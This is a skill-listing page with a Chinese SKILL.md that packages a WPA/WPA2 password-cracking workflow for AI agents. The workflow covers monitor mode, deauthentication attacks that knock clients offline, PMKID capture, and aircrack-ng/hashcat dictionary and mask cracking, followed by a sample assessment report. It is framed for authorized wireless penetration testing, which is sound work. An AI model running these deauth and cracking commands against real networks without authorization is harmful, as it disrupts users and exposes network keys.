performing-wifi-password-cracking-with-aircrack

在授权无线安全评估中捕获 WPA/WPA2 握手包,并使用 aircrack-ng、hashcat 和字典攻击进行离线密码破解, 以评估密码短语强度和无线网络安全状况。

9 stars

Best use case

performing-wifi-password-cracking-with-aircrack is best used when you need a repeatable AI agent workflow instead of a one-off prompt.

在授权无线安全评估中捕获 WPA/WPA2 握手包,并使用 aircrack-ng、hashcat 和字典攻击进行离线密码破解, 以评估密码短语强度和无线网络安全状况。

Teams using performing-wifi-password-cracking-with-aircrack should expect a more consistent output, faster repeated execution, less prompt rewriting.

When to use this skill

  • You want a reusable workflow that can be run more than once with consistent structure.

When not to use this skill

  • You only need a quick one-off answer and do not need a reusable workflow.
  • You cannot install or maintain the underlying files, dependencies, or repository context.

Installation

Claude Code / Cursor / Codex

$curl -o ~/.claude/skills/performing-wifi-password-cracking-with-aircrack/SKILL.md --create-dirs "https://raw.githubusercontent.com/killvxk/cybersecurity-skills-zh/main/skills/performing-wifi-password-cracking-with-aircrack/SKILL.md"

Manual Installation

  1. Download SKILL.md from GitHub
  2. Place it in .claude/skills/performing-wifi-password-cracking-with-aircrack/SKILL.md inside your project
  3. Restart your AI agent — it will auto-discover the skill

How performing-wifi-password-cracking-with-aircrack Compares

Feature / Agentperforming-wifi-password-cracking-with-aircrackStandard Approach
Platform SupportNot specifiedLimited / Varies
Context Awareness High Baseline
Installation ComplexityUnknownN/A

Frequently Asked Questions

What does this skill do?

在授权无线安全评估中捕获 WPA/WPA2 握手包,并使用 aircrack-ng、hashcat 和字典攻击进行离线密码破解, 以评估密码短语强度和无线网络安全状况。

Where can I find the source code?

You can find the source code on GitHub using the link provided at the top of the page.

SKILL.md Source

# 使用 Aircrack-ng 进行 WiFi 密码破解

## 适用场景

- 在授权无线渗透测试中评估 WPA/WPA2/WPA3 密码短语强度
- 测试无线网络是否使用可被离线破解的弱口令或默认密码
- 捕获和分析四次握手(4-Way Handshake)以评估无线认证安全性
- 向利益相关方演示 WEP、弱 WPA2 密码短语和 PMKID 攻击的风险
- 验证企业无线网络是否使用 802.1X/EAP 而非预共享密钥(PSK)

**不要在**未获明确书面授权的无线网络上使用,不要用于干扰无线通信,不要捕获无权测试的网络握手包。

## 前置条件

- 指定目标 SSID 和无线网络范围的书面授权
- 支持监听模式和数据包注入的无线网卡(Alfa AWUS036ACH、Alfa AWUS036ACM 或类似型号)
- 已安装 aircrack-ng 套件、hashcat 和 hcxtools 的 Kali Linux
- 密码字典(rockyou.txt、SecLists 或自定义的组织专用列表)
- 具备 GPU 的系统用于 hashcat 加速(可选,但对大型字典推荐使用)

## 工作流程

### 步骤 1:准备无线接口

```bash
# 识别无线接口
iwconfig
# 或
iw dev

# 终止可能干扰的进程
sudo airmon-ng check kill

# 启用监听模式
sudo airmon-ng start wlan0
# 输出:monitor mode enabled on wlan0mon

# 验证监听模式
iwconfig wlan0mon
# Mode 应显示 "Monitor"

# 或手动启用监听模式
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
```

### 步骤 2:扫描目标网络

```bash
# 扫描所有信道上的接入点
sudo airodump-ng wlan0mon

# 输出列说明:
# BSSID          PWR  Beacons  #Data  CH  ENC   CIPHER  AUTH  ESSID
# AA:BB:CC:DD:EE:FF  -45    120    35   6  WPA2  CCMP    PSK   TargetNetwork

# 识别目标网络参数:
# - BSSID(接入点 MAC 地址)
# - 信道号
# - 加密类型(WPA2-PSK 为目标)
# - 已连接客户端(在下方区域)

# 聚焦扫描目标信道
sudo airodump-ng wlan0mon --channel 6 --bssid AA:BB:CC:DD:EE:FF -w capture
```

### 步骤 3:捕获 WPA2 四次握手

```bash
# 方法 1:等待客户端自然连接
# 保持 airodump-ng 运行,等待 "WPA handshake: AA:BB:CC:DD:EE:FF" 消息
sudo airodump-ng wlan0mon --channel 6 --bssid AA:BB:CC:DD:EE:FF -w handshake_capture

# 方法 2:取消认证客户端强制重连(主动方式)
# 在另一终端向特定客户端发送取消认证包
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

# 或对所有客户端发送取消认证(广播)
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# 方法 3:从 AP 捕获 PMKID(无需客户端)
# 使用 hcxdumptool
sudo hcxdumptool -i wlan0mon --enable_status=1 -o pmkid_capture.pcapng \
  --filterlist_ap=AA:BB:CC:DD:EE:FF --filtermode=2

# 等待 "PMKID" 消息后转换为 hashcat 格式
hcxpcapngtool -o pmkid_hash.hc22000 pmkid_capture.pcapng

# 验证是否捕获了握手包
aircrack-ng handshake_capture-01.cap
# 应显示:目标 BSSID 旁有 "1 handshake"
```

### 步骤 4:使用 Aircrack-ng 破解(基于 CPU)

```bash
# 使用 rockyou 字典进行破解
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF handshake_capture-01.cap

# 使用多个字典
aircrack-ng -w /usr/share/wordlists/rockyou.txt,/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt \
  -b AA:BB:CC:DD:EE:FF handshake_capture-01.cap

# 使用指定 ESSID 破解
aircrack-ng -w /usr/share/wordlists/rockyou.txt -e "TargetNetwork" handshake_capture-01.cap

# 若成功,输出显示:
# KEY FOUND! [ password123 ]
```

### 步骤 5:使用 Hashcat 破解(GPU 加速)

```bash
# 将捕获文件转换为 hashcat 格式
hcxpcapngtool -o hashcat_input.hc22000 handshake_capture-01.cap

# 使用 hashcat 进行字典攻击
hashcat -m 22000 hashcat_input.hc22000 /usr/share/wordlists/rockyou.txt

# 规则攻击(变换字典中的词)
hashcat -m 22000 hashcat_input.hc22000 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# 暴力破解 8 位数字密码
hashcat -m 22000 hashcat_input.hc22000 -a 3 ?d?d?d?d?d?d?d?d

# 掩码攻击(常见模式:单词 + 4 位数字)
hashcat -m 22000 hashcat_input.hc22000 -a 3 -1 ?l?u ?1?1?1?1?1?d?d?d?d

# 针对 PMKID 哈希
hashcat -m 22000 pmkid_hash.hc22000 /usr/share/wordlists/rockyou.txt

# 显示已破解的密码
hashcat -m 22000 hashcat_input.hc22000 --show
```

### 步骤 6:记录和清理

```bash
# 停止监听模式
sudo airmon-ng stop wlan0mon

# 重启网络服务
sudo systemctl restart NetworkManager

# 生成报告
cat > wifi_assessment_report.txt << 'EOF'
WiFi 安全评估结果
==================
目标 SSID:TargetNetwork
BSSID:AA:BB:CC:DD:EE:FF
加密:WPA2-PSK (CCMP)
信道:6

握手包捕获:成功(方法:客户端取消认证)
破解结果:密码已找到
密码:[安全记录]
破解时间:3 分 47 秒(rockyou.txt,hashcat GPU)

建议:更换为 15 个字符以上、含大小写字母、数字和符号的密码短语,
或迁移至支持 802.1X 的 WPA2/WPA3-Enterprise。
EOF

# 安全处理捕获文件(包含敏感认证材料)
sha256sum handshake_capture-01.cap > evidence_hashes.txt
# 按照评估协议传输至安全证据存储
```

## 核心概念

| 术语 | 定义 |
|------|------|
| **四次握手(4-Way Handshake)** | 客户端与 AP 之间的 WPA/WPA2 认证交换过程,从 PSK 派生会话密钥,可被捕获用于离线密码破解 |
| **PMKID** | 成对主密钥标识符,包含在 AP 发出的第一个 EAPOL 帧中,无需捕获完整握手或连接的客户端即可进行密码破解 |
| **监听模式(Monitor Mode)** | 无线接口模式,可在不关联任何接入点的情况下捕获信道上的所有无线帧 |
| **取消认证攻击(Deauthentication Attack)** | 发送伪造的 802.11 管理帧断开客户端与 AP 的连接,迫使重连以生成可捕获的握手包 |
| **PSK(预共享密钥)** | WPA/WPA2-Personal 网络中所有用户用于认证的静态密码,易受离线字典攻击 |
| **802.1X/EAP** | 使用 RADIUS 服务器的企业无线认证,提供每用户凭证,消除共享密码漏洞 |

## 工具与系统

- **aircrack-ng 套件**:综合无线安全工具集,包含 airodump-ng(捕获)、aireplay-ng(注入)和 aircrack-ng(破解)
- **hashcat**:支持 WPA/WPA2 握手包(模式 22000)的 GPU 加速密码破解工具,支持字典、规则和掩码攻击
- **hcxtools**:用于捕获 PMKID 并将无线捕获转换为 hashcat 兼容格式的工具集
- **hcxdumptool**:专为 PMKID 提取设计的捕获工具,无需客户端取消认证
- **cowpatty**:支持预计算哈希表的 WPA/WPA2 破解工具,可加速字典攻击

## 常见场景

### 场景:企业办公室无线渗透测试

**背景**:一家金融服务公司需要评估其无线网络安全性。他们有三个 SSID:Corp-WiFi(员工使用 WPA2-Enterprise)、Guest-WiFi(访客使用 WPA2-PSK)和 IoT-WiFi(IoT 设备使用 WPA2-PSK)。评估授权测试所有三个网络。

**方法**:
1. 扫描所有三个 SSID,识别其 BSSID、信道和加密类型
2. 通过检查信标帧验证 Corp-WiFi 使用 802.1X/EAP——已确认,无 PSK 可破解
3. 通过取消认证已连接设备并捕获重连来获取 Guest-WiFi 的四次握手包
4. 使用 rockyou.txt 对 Guest-WiFi 握手包运行 hashcat——密码 "Welcome2024!" 在 47 秒内被破解
5. 从 IoT-WiFi 接入点捕获 PMKID(无需取消认证客户端)并使用 hashcat 破解——在 12 秒内找到密码 "iot12345"
6. 演示 Guest-WiFi 和 IoT-WiFi 密码强度不足,易被破解
7. 建议将 Guest-WiFi 迁移至每会话凭证的强制门户,将 IoT-WiFi 密码强度提升至 20 个字符以上

**注意事项**:
- 发送过多取消认证帧,干扰测试范围之外的合法无线用户
- 未使用支持目标网络频段(2.4 GHz 与 5 GHz)的无线网卡
- 尝试使用传统握手包捕获方式破解 WPA3-SAE 网络(SAE 可抵御离线攻击)
- 在共享系统上运行 GPU 破解时未监控温度和功耗

## 输出格式

```
## 无线安全评估报告

**评估日期**:2024-03-15
**位置**:企业办公室,A 楼

### 网络清单

| SSID | BSSID | 加密 | 认证 | 信道 | 可破解 |
|------|-------|------|------|------|--------|
| Corp-WiFi | AA:BB:CC:11:22:33 | WPA2 | 802.1X | 36 | N/A(企业版) |
| Guest-WiFi | AA:BB:CC:44:55:66 | WPA2 | PSK | 6 | 是 - 47 秒 |
| IoT-WiFi | AA:BB:CC:77:88:99 | WPA2 | PSK | 1 | 是 - 12 秒 |

### 发现

**发现 1:Guest-WiFi 密码弱(高危)**
- 密码:「Welcome2024!」(字典攻击 47 秒破解)
- 在 rockyou.txt 前 10 万条目中存在
- 所有访客共享,无轮换策略

**发现 2:IoT-WiFi 密码极弱(严重)**
- 密码:「iot12345」(12 秒破解)
- 默认模式密码,可访问 IoT 设备网络
- IoT-WiFi 与企业资源之间无网络分段

### 建议
1. 将 Guest-WiFi 迁移至每会话凭证的强制门户
2. 将 IoT-WiFi 更换为 20 个字符以上的随机密码短语并按季度轮换
3. 实施网络分段,将 IoT VLAN 与企业资源隔离
4. 考虑为 PSK 网络采用 WPA3-SAE,防止离线破解
5. 启用 802.11w 保护管理帧,防止取消认证攻击
```

Related Skills

performing-yara-rule-development-for-detection

9
from killvxk/cybersecurity-skills-zh

通过识别可执行文件中的唯一字节模式、字符串和行为指标,开发精准的 YARA 恶意软件检测规则,同时将误报率降至最低。

performing-wireless-security-assessment-with-kismet

9
from killvxk/cybersecurity-skills-zh

使用 Kismet 通过被动射频监控进行无线网络安全评估,检测流氓接入点(Rogue AP)、隐藏 SSID、弱加密和未授权客户端。

performing-wireless-network-penetration-test

9
from killvxk/cybersecurity-skills-zh

执行无线网络渗透测试,通过捕获握手包、破解 WPA2/WPA3 密钥、检测流氓接入点以及使用 Aircrack-ng 和相关工具测试无线网络分段,评估 WiFi 安全性。

performing-windows-artifact-analysis-with-eric-zimmerman-tools

9
from killvxk/cybersecurity-skills-zh

使用 Eric Zimmerman 的开源 EZ Tools 套件(包括 KAPE、MFTECmd、PECmd、LECmd、JLECmd 和 Timeline Explorer)执行全面的 Windows 取证制品分析,解析注册表 hive、预取文件、事件日志和文件系统元数据。

performing-web-cache-poisoning-attack

9
from killvxk/cybersecurity-skills-zh

在授权安全测试期间,通过未纳入缓存键的头部和参数毒化缓存响应,利用 Web 缓存机制向其他用户投递恶意内容。

performing-web-cache-deception-attack

9
from killvxk/cybersecurity-skills-zh

通过利用 CDN 缓存层与源服务器之间的路径规范化差异,执行 Web 缓存欺骗攻击,从而缓存并获取敏感的已认证内容。

performing-web-application-vulnerability-triage

9
from killvxk/cybersecurity-skills-zh

使用 OWASP 风险评级方法论对 DAST/SAST 扫描器的 Web 应用程序漏洞发现进行分类,区分真阳性和假阳性,并确定修复优先级。

performing-web-application-scanning-with-nikto

9
from killvxk/cybersecurity-skills-zh

Nikto 是一款开源 Web 服务器和 Web 应用程序扫描器,可针对超过 7,000 个潜在危险文件/程序进行测试,检查超过 1,250 个服务器的过期版本,并识别超过 270 个服务器的版本特定问题。

performing-web-application-penetration-test

9
from killvxk/cybersecurity-skills-zh

遵循 OWASP Web 安全测试指南(WSTG)方法论,对 Web 应用程序执行系统化安全测试,识别认证、授权、 输入验证、会话管理和业务逻辑中的漏洞。测试人员以 Burp Suite 作为主要拦截代理,结合手动测试技术 发现自动化扫描器遗漏的缺陷。适用于 Web 应用渗透测试、OWASP 测试、应用安全评估或 Web 漏洞测试等请求场景。

performing-web-application-firewall-bypass

9
from killvxk/cybersecurity-skills-zh

使用编码技术、HTTP 方法操控、参数污染和载荷混淆绕过 Web 应用防火墙保护,将 SQL 注入、XSS 及其他攻击载荷穿透 WAF 检测规则。

performing-vulnerability-scanning-with-nessus

9
from killvxk/cybersecurity-skills-zh

使用 Tenable Nessus 执行认证和未认证漏洞扫描,识别网络基础设施、服务器和应用程序中的已知漏洞、 错误配置、默认凭据和缺失补丁。扫描器将发现与 CVE 数据库和 CVSS 评分关联,生成优先级修复指导。 适用于漏洞扫描、Nessus 评估、补丁合规检查或自动化漏洞检测等请求场景。

performing-vlan-hopping-attack

9
from killvxk/cybersecurity-skills-zh

在授权环境中使用交换机欺骗(Switch Spoofing)和双标签(Double Tagging)技术模拟 VLAN 跳转攻击, 测试 VLAN 分段有效性,并验证交换机端口安全配置对二层旁路攻击的抵御能力。